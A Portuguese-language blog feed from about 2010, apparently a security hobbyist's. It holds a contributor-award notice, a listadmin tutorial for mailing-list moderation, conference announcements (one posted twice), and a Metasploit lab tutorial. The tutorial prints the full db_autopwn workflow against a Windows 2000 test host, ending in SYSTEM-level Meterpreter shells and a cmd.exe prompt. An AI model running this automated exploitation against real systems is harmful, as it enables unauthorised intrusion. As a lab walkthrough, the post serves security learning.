Editora Novatec Premia Colaborador da Dicas-L
29 de Outubro de 2010, 0:00 - sem comentários ainda“A Editora Novatec ofereceu como prêmio, ao Alexandro Silva, o livro WordPress 3 Básico. Alexandro Silva, com 23 dicas publicadas em 2010, é o colaborador mais ativo neste ano. O Alexandro mantém o blog Alexos Core Labs, especializado em software livre e pesquisa em segurança de computadores.
Por aproximadamente dois anos, a Editora Novatec presenteou com um guia de referência rápida, todos os colaboradores que enviavam dicas para a Dicas-L. Foi uma doação considerável, em termos de conhecimento e recursos financeiros, para a comunidade de software livre. Gostaria de manifestar minha gratidão à Editora Novatec, por todo o apoio que tem nos dado ao longo dos anos, como também ao Alexandro e a todos os colaboradores que compartilham seu conhecimento tão generosamente com as milhares de pessoas que visitam a Dicas-L“
Fonte: Dicas-L
See:
Listadmin: Administrando as filas do mailman de forma rápida e simples
27 de Outubro de 2010, 0:00 - sem comentários aindaAlém de fazer parte do Sysadmin Team do GNOME também colaboro com o Moderator Team. Esta equipe de 02 pessoas é responsável por moderar todas as 250 listas existentes no Projeto GNOME.
Até pouquissimo tempo este trabalho ultra-chato era feito através do ambiente de gerência Web, só que as coisas estão mudando.
Christer Edwards, atual coordenador dos Sysadmins, recomendou a utilização da ferramenta listadmin. Esta excelente ferramenta facilita a moderação de várias listas de discurssão de forma bastante eficaz através da linha de comando.
Agora vamos ao que interessa:
Instalação
aptitude install listadmin
Configuração
Crie o arquivo .listadmin.ini no diretório home do seu usuário com a seguinte sintaxe:
adminurl – Informe a URL da lista
default – Informe a ação padrão Approve,Reject,Discard,Skip,view Body,Full,jump
log – Informe onde será gravado o arquivo de logpassword – Informe a senha da lista
lista@domain.com – Informe o email da lista
Exemplo:
vim ~/.listadmin.ini
adminurl http://mail.gnome.org/mailman/admindb/gnome-love
default discard
log ~/.listadmin.logpassword senhalista
gnome-love@gnome.org
Altere as permissões do arquivo
chmod 744 ~/.listadmin.ini
Agora é só correr pro abraço
listadmin
[1/1] ============== gnome-love@gnome.org ==============================
From: skovacs@duaa.duke.edu
Subject: Oct 27/10/2010
Reason: Post by non-member to a members-only list Spam? 2
Approve/Reject/Discard/Skip/view Body/Full/jump #/Undo/Help/Quit [D] ?
Submit changes? [yes]
Desta forma a administração das listas do GNOME ficará simples e rápida.
See:
Palestras no IV ENSL e participação na H2HC Conference
9 de Outubro de 2010, 0:00 - sem comentários aindaEm novembro participarei de 02 grandes eventos. Iniciando com o IV ENSL e o VII Fórum Gnome dias 05 e 06 em Natal/RN onde farei 02 palestras.
No VII Fórum Gnome que ocorrerá no IV ENSL o tema será “Por trás da Infra-estrutura do GNOME: Trabalho para Sysadmins”, nesta apresentação vou mostrar como funciona a infra-estrutura por trás do Projeto Gnome , quem são as pessoas e como se tornar um sysadmin deste grande projeto.
A apresentação aprovada pelos avaliadores foi “Ataques e Contra-medidas – Como proteger seus sistemas na Cyberwar” nela apresentarei a metodologia por trás de um ataque, dicas de como se proteger, e como não poderia deixar de acontecer farei um HandsOn explorando alguns 0days bastantes conhecidos.
No final ( 26 a 29 ) estarei no H2HC ( Hackers to Hackers Conference ), evento que reuni a nata dos hackers brasileiros. Os seguintes palestrantes confirmaram presença:
Anchises De Paula – Security Intelligence Analyst, iDefense
Bruno Oliveira – Security Consultant at Trustwave’s Spiderlabs
Carlos Sarraute – Researcher, CoreLabs
Dario Filho – André Grégio – Mestrando e Doutorando – Unicamp
Eric Filiol – Directeur du laboratoire de virologie et de cryptologie opérationnelles – ESIEA Ouest
Fermin Sena – Software Security Engineer, Microsoft
Jeremy Brown – Security Researcher – Tenable
Matthieu Suiche – Founder, MoonSols
Nelson Brito – (Independent Researcher)
Ranieri Romera – Threat Researcher, TrendMicro
Rodrigo Montoro – TrustWave SpiderLabs Researcher
Sergey Bratus – Research Assistant Professor, Computer Science at Dartmouth College
Tony Rodrigues – (Independent Consultant)
Wagner Elias – Research & Development Manager, Conviso IT Security
Com certeza estes eventos trarão muito conhecimento e muiiitttaaa diversão!!!
Agradecimentos:
* A Colivre por patrocinar minha ida ao H2HC Conference.
* A Gnome Foundation e a organização do IV ENSL por permitir minha presença em Natal.
See:
Palestras no IV ENSL e participação no H2HC Conference
9 de Outubro de 2010, 0:00 - sem comentários aindaEm novembro participarei de 02 grandes eventos. Iniciando com o IV ENSL e o VII Fórum Gnome dias 05 e 06 em Natal/RN onde farei 02 palestras.
No VII Fórum Gnome que ocorrerá no IV ENSL o tema será “Por trás da Infra-estrutura do GNOME: Trabalho para Sysadmins”, nesta apresentação vou mostrar como funciona a infra-estrutura por trás do Projeto Gnome , quem são as pessoas e como se tornar um sysadmin deste grande projeto.
A apresentação aprovada pelos avaliadores foi “Ataques e Contra-medidas – Como proteger seus sistemas na Cyberwar” nela apresentarei a metodologia por trás de um ataque, dicas de como se proteger, e como não poderia deixar de acontecer farei um HandsOn explorando alguns 0days bastantes conhecidos.
No final ( 26 a 29 ) estarei no H2HC ( Hackers to Hackers Conference ), evento que reuni a nata dos hackers brasileiros. Os seguintes palestrantes confirmaram presença:
Anchises De Paula – Security Intelligence Analyst, iDefense
Bruno Oliveira – Security Consultant at Trustwave’s Spiderlabs
Carlos Sarraute – Researcher, CoreLabs
Dario Filho – André Grégio – Mestrando e Doutorando – Unicamp
Eric Filiol – Directeur du laboratoire de virologie et de cryptologie opérationnelles – ESIEA Ouest
Fermin Sena – Software Security Engineer, Microsoft
Jeremy Brown – Security Researcher – Tenable
Matthieu Suiche – Founder, MoonSols
Nelson Brito – (Independent Researcher)
Ranieri Romera – Threat Researcher, TrendMicro
Rodrigo Montoro – TrustWave SpiderLabs Researcher
Sergey Bratus – Research Assistant Professor, Computer Science at Dartmouth College
Tony Rodrigues – (Independent Consultant)
Wagner Elias – Research & Development Manager, Conviso IT Security
Com certeza estes eventos trarão muito conhecimento e muiiitttaaa diversão!!!
Agradecimentos:
* A Colivre por patrocinar minha ida ao H2HC Conference.
* A Gnome Foundation e a organização do IV ENSL por permitir minha presença em Natal.
See:
Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit
1 de Outubro de 2010, 0:00 - sem comentários ainda<p>No <a href="http://blog.alexos.com.br/?p=1996">post anterior</a> apresentei como a integração entre o <a href="http://www.nessus.org">Nessus</a> e o <a href="http://www.metasploit.com">MSF</a> pode tornar nossa vida bastante interessante.</p> <p>Agora irei rebuscar os testes usando o <a href="http://www.mysql.com/">MySQL</a> para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o <a href="http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html">db_autopwn</a>.</p> <p>O ambiente dos testes continuará o mesmo:</p> <p>Host Debian com o Nessus, Metasploit e o MySQL<br /> Host Windows 2000</p> <p>Pré-requisito para os testes:</p> <p>Possuir os seguintes itens instalados:</p> <blockquote><p> * libdbd-mysql-ruby1.8<br /> * Módulo activerecord ( gem install activerecord ) </p></blockquote> <p>Preparando o ambiente</p> <p>Inicei o driver para MySQL no MSF</p> <blockquote><p> <strong>msf> db_driver mysql</strong> </p></blockquote> <p>Conectei o banco e criei uma base de dados chamada msf</p> <blockquote><p> <strong>msf> db_connect msf:******@localhost/msf</strong> </p></blockquote> <p>Importei o report do Nessus para o banco</p> <blockquote><p> <strong>msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0<br /> </strong> </p></blockquote> <p>Listando as portas apartir da base de dados msf</p> <blockquote><p> <strong><br /> msf> db_services<br /> </strong></p> <p>Services<br /> ========</p> <p>created_at info name port proto state updated_at Host Workspace<br /> ———- —- —- —- —– —– ———- —- ———<br /> Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> ri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default<br /> Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default </p></blockquote> <p>Listando as vulnerabilidades apartir da base de dados msf</p> <blockquote><p> <strong><br /> msf > db_vulns<br /> </strong></p> <p>[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=<br /> [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=<br /> …. </p></blockquote> <p><strong><br /> O db-autopwn<br /> </strong></p> <p>O db_autopwn escaneará a base de dados e criará uma lista de módulos específicos para cada vulnerabilidade existente no alvo. A criação destes módulos ocorrerá de 2 formas:</p> <p> 1 – Os exploits serão carregados através da análise da lista de vulnerabilidades. Este tipo de cross-referência depende de alguns padrões como OSVDB, Bugtraq, e CVE para vincular o exploit ao alvo.</p> <p> 2 – Usa portas padrões associadas a cada exploit para localizar os alvos que estão rodando o mesmo serviço. </p> <p><strong><br /> msf > db_autopwn<br /> </strong></p> <blockquote><p> [*] Usage: db_autopwn [options]<br /> -h Display this help text<br /> -t Show all matching exploit modules<br /> -x Select modules based on vulnerability references<br /> -p Select modules based on open ports<br /> -e Launch exploits against all matched targets<br /> -r Use a reverse connect shell<br /> -b Use a bind shell on a random port (default)<br /> -q Disable exploit module output<br /> -R [rank] Only run modules with a minimal rank<br /> -I [range] Only exploit hosts inside this range<br /> -X [range] Always exclude hosts inside this range<br /> -PI [range] Only exploit hosts with these ports open<br /> -PX [range] Always exclude hosts with these ports open<br /> -m [regex] Only run modules whose name matches the regex<br /> -T [secs] Maximum runtime for any exploit in seconds </p></blockquote> <p><strong><br /> Hora da ação <img class="wp-smiley" src="http://blog.alexos.com.br/wp-includes/images/smilies/icon_razz.gif" alt=":P" /><br /> </strong></p> <p><strong><br /> msf > db_autopwn -p -t -e<br /> </strong></p> <blockquote><p> [*] Analysis completed in 7 seconds (0 vulns / 0 refs)<br /> [*]<br /> [*] ================================================================================<br /> [*] Matching Exploit Modules<br /> [*] ================================================================================<br /> [*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)<br /> [*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)<br /> [*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)<br /> [*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)<br /> [*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)<br /> [*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)<br /> [*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)<br /> [*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)<br /> …. </p></blockquote> <blockquote><p> ================================================================================<br /> [*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800…<br /> [*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445…<br /> [*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21…<br /> [*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21…<br /> [*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21…<br /> [*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445…<br /> [*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445…<br /> [*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445…<br /> [*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139…<br /> …. </p></blockquote> <blockquote><p> [*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution…<br /> [*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010<br /> [*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010<br /> [*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution…<br /> [*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution…<br /> [*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…<br /> [*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…<br /> [*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…<br /> …. </p></blockquote> <blockquote><p> [*] The autopwn command has completed with 2 sessions<br /> [*] Enter sessions -i [ID] to interact with a given session ID<br /> [*]<br /> [*] ================================================================================</p> <p>Active sessions<br /> ===============</p> <p> Id Type Information Connection Via<br /> — —- ———– ———- —<br /> <strong><br /> 1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom<br /> 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom<br /> </strong><br /> [*] ================================================================================ </p></blockquote> <p>Iniciando a sessão</p> <p><strong><br /> msf > sessions -i 1<br /> </strong></p> <blockquote><p> [*] Starting interaction with 1… </p></blockquote> <p><strong><br /> meterpreter > execute -i -H -f cmd.exe<br /> </strong></p> <blockquote><p> Process 736 created.<br /> Channel 1 created.<br /> <strong><br /> Microsoft Windows 2000 [Version 5.00.2195]<br /> (C) Copyright 1985-1999 Microsoft Corp.</p> <p>C:\WINNT\system32><br /> </strong> </p></blockquote> <p><strong><br /> Observações importantes:<br /> </strong></p> <blockquote><p> <strong><br /> 0 – Isso não é magia é tecnologia</p> <p>1 – Estes testes são de caráter totalmente experimental;</p> <p>2 – O uso destas ferramentas e ações requerem alguns conhecimentos prévios como:</p> <p> * Entender sistemas operacionais;<br /> * Entender profundamente o protocolo TCP/IP;<br /> * Entender o funcionamento dos exploits, payloads, shellcodes e etc;<br /> * Entender a dinâmica das causas e os impactos das vulnerabilidades;<br /> * Usar estes conhecimentos de forma ética;<br /> </strong> </p></blockquote> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=1996&lang=pt-br" class="crp_title">Brincando com o plugin do Nessus para o Metasploit</a></li><li><a href="http://blog.alexos.com.br/?p=101&lang=pt-br" class="crp_title">Usando Nmap</a></li><li><a href="http://blog.alexos.com.br/?p=297&lang=pt-br" class="crp_title">Usando o Nikto webserver scanner</a></li><li><a href="http://blog.alexos.com.br/?p=1954&lang=pt-br" class="crp_title">DLL Hijacking também afeta algumas Linux distros</a></li><li><a href="http://blog.alexos.com.br/?p=852&lang=pt-br" class="crp_title">Instalando o Open-Audit no Debian 5.0</a></li></ul></div><p><a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Google Bookmarks" class="a2a_button_google_bookmarks" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/google.png" height="16" alt="Google Bookmarks" width="16" /></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Twitter" class="a2a_button_twitter" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/twitter.png" height="16" alt="Twitter" width="16" /></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Technorati Favorites" class="a2a_button_technorati_favorites" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/technorati.png" height="16" alt="Technorati Favorites" width="16" /></a> <a href="http://www.addtoany.com/add_to/google_gmail?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Google Gmail" class="a2a_button_google_gmail" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/gmail.png" height="16" alt="Google Gmail" width="16" /></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="LinkedIn" class="a2a_button_linkedin" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/linkedin.png" height="16" alt="LinkedIn" width="16" /></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Google Reader" class="a2a_button_google_reader" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/reader.png" height="16" alt="Google Reader" width="16" /></a> <a href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="WordPress" class="a2a_button_wordpress" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/wordpress.png" height="16" alt="WordPress" width="16" /></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Slashdot" class="a2a_button_slashdot" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/slashdot.png" height="16" alt="Slashdot" width="16" /></a> <a href="http://www.addtoany.com/add_to/reddit?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Reddit" class="a2a_button_reddit" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/reddit.png" height="16" alt="Reddit" width="16" /></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Delicious" class="a2a_button_delicious" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/delicious.png" height="16" alt="Delicious" width="16" /></a> <a href="http://www.addtoany.com/add_to/multiply?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Multiply" class="a2a_button_multiply" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/multiply.png" height="16" alt="Multiply" width="16" /></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Digg" class="a2a_button_digg" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/digg.png" height="16" alt="Digg" width="16" /></a> <a href="http://www.addtoany.com/add_to/identi_ca?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D2068%26amp%3Blang%3Dpt-br&linkname=Usando%20o%20Nessus%20plugin%20com%20o%20MySQL%20e%20o%20db_autopwn%20no%20Metasploit" title="Identi.ca" class="a2a_button_identi_ca" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/identica.png" height="16" alt="Identi.ca" width="16" /></a> <a href="http://www.addtoany.com/share_save" class="a2a_dd addtoany_share_save"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/share_save_171_16.png" height="16" alt="Share" width="171" /></a> </p>